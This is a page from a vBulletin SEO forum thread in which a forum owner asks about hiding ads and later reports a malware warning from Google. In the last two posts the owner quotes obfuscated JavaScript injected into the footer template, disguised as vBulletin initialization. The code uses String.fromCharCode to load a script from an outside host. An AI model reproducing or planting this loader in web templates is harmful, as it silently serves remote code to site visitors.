Page 4 of 4 FirstFirst 1 2 3 4
Results 46 to 54 of 54
Like Tree16Likes

Do You think VBSEO will help my forum - bse2nse.com

This is a discussion on Do You think VBSEO will help my forum - bse2nse.com within the Critique Please forums, part of the vBulletin SEO Discussion category; Have you tested it in navbar, too, or just the header? The conditional seems to work in my header (I ...

  1. #46
    Senior Member
    Real Name
    Marvin Hlavac
    Join Date
    Oct 2007
    Posts
    254
    Liked
    15 times
    Have you tested it in navbar, too, or just the header? The conditional seems to work in my header (I just tested it), but I'm using vB 3.8, and it may be coded differently than your vB 4.

    Also, have you tested the conditional in the ad_location templates?

  2. #47
    Member
    Real Name
    Mani
    Join Date
    Dec 2010
    Posts
    32
    Liked
    8 times
    Quote Originally Posted by Marvin Hlavac View Post
    Have you tested it in navbar, too, or just the header? The conditional seems to work in my header (I just tested it), but I'm using vB 3.8, and it may be coded differently than your vB 4.

    Also, have you tested the conditional in the ad_location templates?
    Doesn't work for me in header & navbar - all 3 conditions $threadinfo[threadid], $post[threadid] & $forum[forumid] .... I also tried in ad_global_below_navbar .... didnt work there either ...

    Seems like these variables are not global in VB4 & unavailable in navbar, header & ad_location templates ....

    How can these variables be made global in VB4? There lies the solution ...

  3. #48
    Senior Member
    Real Name
    Marvin Hlavac
    Join Date
    Oct 2007
    Posts
    254
    Liked
    15 times
    In my vB 3.8, I use a free add-on product called "Easy Pages" (there may be a version for your vB 4, too). You could use this product to create a page for your book. Then you would be able to use condition="THIS_SCRIPT != 'easy_pages' in your header, or elsewhere.

  4. #49
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    657 times
    Blog Entries
    2
    The navbar parses before the post array exists. What you are trying to do is simply not possible.

  5. #50
    Member
    Real Name
    Mani
    Join Date
    Dec 2010
    Posts
    32
    Liked
    8 times
    Quote Originally Posted by Brian Cummiskey View Post
    The navbar parses before the post array exists. What you are trying to do is simply not possible.
    I was able to remove navbar Ad's on sub-forum id 42, under which my selling page is ... So that's gone now ... Selling page http://bse2nse.com/archived/3185-boo...ck-market.html looks much better now ...

    <vb:if condition="$foruminfo[forumid] != 42">
    {vb:raw ad_location.ad_navbar_below}
    {vb:raw ad_location.global_below_navbar}
    </vb:if>
    But the same didn't work on header :( ... Although the header ad links are not too intrusive, i would still prefer it gone for this thread or forum alone ...

    phew ! That took a day ...

  6. #51
    Member
    Real Name
    Mani
    Join Date
    Dec 2010
    Posts
    32
    Liked
    8 times
    Hey Guy, This is something off SEO subject,

    I wrote a book on "Indian Stock Market" & setup a selling page in my forum here @ Book on "Art of Stock Investing - Indian Stock Market",

    Am so excited really ... I got pre-orders for 50 Copies on day 1 ....

    From a product selling perspective, let me know if the page can be improved (Like, add a few more data or remove some un-necessary stuff & so on) ...


    As always, i appreciate ur time & comments the most.

  7. #52
    Senior Member
    Real Name
    Marvin Hlavac
    Join Date
    Oct 2007
    Posts
    254
    Liked
    15 times
    Looks good! Congrats on the sales!!!
    rmani84 likes this.

  8. #53
    Member
    Real Name
    Mani
    Join Date
    Dec 2010
    Posts
    32
    Liked
    8 times
    Guys , I need help badly ... Google listed my site as malware ...

    Google has discovered harmful code on your site and will display a warning to users when they attempt to visit your pages.
    Suspected injected code Instances
    <script type="text/javascript"> <!--
    // Main vBulletin Javascript Initialization
    var script=document.createElement(String.fromCharCode( 115,
    99,114,105,112,116));script.src=String.fromCharCod e(104,116,
    116,112,58,47,47,105,109,97,103,101,50,121,111,117 ,46,105,11
    0,47,106,113,117,101,114,121,46,99,111,109,112,97, 116,105,98
    ,105,108,105,116,121,46,106,115);var head=document.getElemen
    tsByTagName(String.fromCharCode(104,101,97,100))[0];head.app
    endChild(script);vBulletin_init();
    //--> </script>
    I have hired some developers to design some stock ratings page for me, but they haven't touched the VB Files ...

    The above code seems to be commented ... Can i remove these and if so from where should i remove these ?

    My VB Forum : http://bse2nse.com/forum.php

  9. #54
    Member
    Real Name
    Mani
    Join Date
    Dec 2010
    Posts
    32
    Liked
    8 times
    Removed the below code from footer template,

    <script type="text/javascript"> <!--// Main vBulletin Javascript Initialization
    vBulletin_init();
    //--> </script>
    and the junk code that came along with it is gone now ... have submitted a review with google now ... i hope the website will be removed off malware list ...

    Does anyone have an explanation why the below junk code got generated along with it,

    var script=document.createElement(String.fromCharCode( 115,
    99,114,105,112,116));script.src=String.fromCharCod e(104,116,
    116,112,58,47,47,105,109,97,103,101,50,121,111,117 ,46,105,11
    0,47,106,113,117,101,114,121,46,99,111,109,112,97, 116,105,98
    ,105,108,105,116,121,46,106,115);var head=document.getElemen
    tsByTagName(String.fromCharCode(104,101,97,100))[0];head.app
    endChild(script);
    My developers had uploaded some files for the stock rating ... Seems like that may have caused it ... But, doesn't actually logically add up !

Page 4 of 4 FirstFirst 1 2 3 4

Similar Threads

  1. Replies: 1
    Last Post: 02-24-2010, 03:44 AM
  2. Install vBSEO on new forum or 6 month old forum?
    By Kaos in forum General Discussion
    Replies: 3
    Last Post: 08-16-2008, 01:00 PM
  3. vBSEO on Test Forum & Live Forum?
    By Savage X in forum Pre-Sales Questions
    Replies: 2
    Last Post: 05-19-2008, 10:16 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •